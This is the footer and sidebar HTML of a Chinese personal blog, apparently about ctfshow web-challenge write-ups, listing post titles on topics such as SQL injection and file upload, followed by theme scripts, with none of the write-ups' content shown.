<div class="breadcrumb">
<a href="/categories/ctfshow-web%E5%85%A5%E9%97%A8wp/" title="分类于 ctfshow-web入门wp">ctfshow-web入门wp</a>
</div>

    <span><a href="/2025/09/05/ctfshow%E7%88%86%E7%A0%B4/" title="ctfshow爆破">ctfshow爆破</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/ctfshow-web%E5%85%A5%E9%97%A8wp/" title="分类于 ctfshow-web入门wp">ctfshow-web入门wp</a>
</div>

    <span><a href="/2025/09/05/ctfshow%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" title="ctfshow命令执行">ctfshow命令执行</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/ctfshow-web%E5%85%A5%E9%97%A8wp/" title="分类于 ctfshow-web入门wp">ctfshow-web入门wp</a>
</div>

    <span><a href="/2025/09/06/ctfshow-SQL%E6%B3%A8%E5%85%A5/" title="ctfshow SQL注入">ctfshow SQL注入</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2025/07/08/hello-world/" title="Hello World">Hello World</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/ctfshow-web%E5%85%A5%E9%97%A8wp/" title="分类于 ctfshow-web入门wp">ctfshow-web入门wp</a>
</div>

    <span><a href="/2025/09/06/ctfshow%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" title="ctfshow文件上传">ctfshow文件上传</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/ctfshow-web%E5%85%A5%E9%97%A8wp/" title="分类于 ctfshow-web入门wp">ctfshow-web入门wp</a>
</div>

    <span><a href="/2025/09/05/ctfshow%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/" title="ctfshow信息搜集">ctfshow信息搜集</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/ctfshow-web%E5%85%A5%E9%97%A8wp/" title="分类于 ctfshow-web入门wp">ctfshow-web入门wp</a>
</div>

    <span><a href="/2025/09/05/ctfshow%20php%E7%89%B9%E6%80%A7/" title="ctfshow php特性">ctfshow php特性</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">AlgoZZi @ AlgoZZi's Blog</span>
  </div>
  <div class="count">
    <span class="post-meta-item-icon">
      <i class="ic i-chart-area"></i>
    </span>
    <span title="站点总字数">1.3m 字</span>

    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="ic i-coffee"></i>
    </span>
    <span title="站点阅读时长">19:46</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2025/09/05/ctfshow文件包含/',
    favicon: {
      show: "AlgoZZi's Blog",
      hide: "少用离开试探爱"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
